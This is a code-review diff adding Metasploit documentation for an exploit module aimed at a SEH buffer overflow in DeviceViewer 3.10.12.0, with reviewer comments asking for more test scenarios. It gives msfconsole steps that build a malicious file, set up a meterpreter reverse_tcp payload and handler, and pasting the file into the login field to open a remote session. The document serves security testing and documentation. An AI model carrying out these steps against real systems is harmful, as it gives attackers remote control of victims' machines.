documentation/modules/exploit/windows/fileformat/device_viewer.md

```diff
@@ -0,0 +1,115 @@
+## Vulnerable Application
+
+This module exploits a SEH stack buffer overflow in DeviceViewer version 3.10.12.0. By creating a specially crafted file and copying its content in the "User" login field, an attacker will be able to gain arbitrary code execution.
+
+Link to vulnerable software [EDB](https://www.exploit-db.com/apps/4d10486a079bd1f1864c30e86cd2aa80-DeviceViewer.exe) - [VoidSec](https://github.com/VoidSec/Exploit-Development/blob/master/windows/x86/local/DeviceViewer_v.3.10.12.0/DeviceViewer.exe)
+
+## Test Results
+  * Windows XP SP3 Pro x64 (DEP & ASLR disabled) - trigger
+  * Windows 7 x86 (DEP & ASLR disabled) - trigger
+  * Windows 10 Pro x64 v.1909 Build 18363.720 (DEP & ASLR enabled) - trigger
+
+## Verification Steps
+  Example steps in this format (is also in the PR):
+
+  1. Install the application on the target machine
+  2. Start msfconsole
+  3. Do: ```use exploit/windows/fileformat/device_viewer```
+  4. Do: ```set payload [windows/meterpreter/reverse_tcp]```
+  5. Do: ```set LHOST [IP]```
+  6. Do: ```exploit```
+  7. This file will be created: ```DeviceViewer_v.3.10.12.0_exploit.txt stored at /home/[USER]/.msf4/local/DeviceViewer_v.3.10.12.0_exploit.txt```
+  8. Do: ```use exploit/multi/handler```
+  9. Do: ```set payload [windows/meterpreter/reverse_tcp]```
+  10. Do: ```set LHOST [IP]```
+  11. Do: ```exploit```
+  12. Do: on the target Windows machine open Device Viewer
+  13. Device Viewer's will present a login prompt
+  14. Do: paste the content of `DeviceViewer_v.3.10.12.0_exploit.txt` in the "User" field
+  15. Do: press the "Login" button
+  16. The handler will receive the newly created session
+ 
+## Options
+
+  **FILENAME**
+
+  The file name
+
+## Scenarios
+### DeviceViewer v.3.10.12.0 on Windows 10 (Pro x64 v.1909 Build 18363.720, DEP & ASLR enabled)
```

Comment:
Given this exploit targets multiple systems, I would expect you to have two other scenarios showing the exploit being tested against Windows XP SP3 and WIndows 7 SP1, as you noted these targets were also tested. Please update the `# Scenarios` section with the result of testing these target.

Reply:
Marking this and others as applicable as unresolved until I can see changes uploaded which fix this @VoidSec

Reply:
Confirmed resolved, thanks for doing this @VoidSec!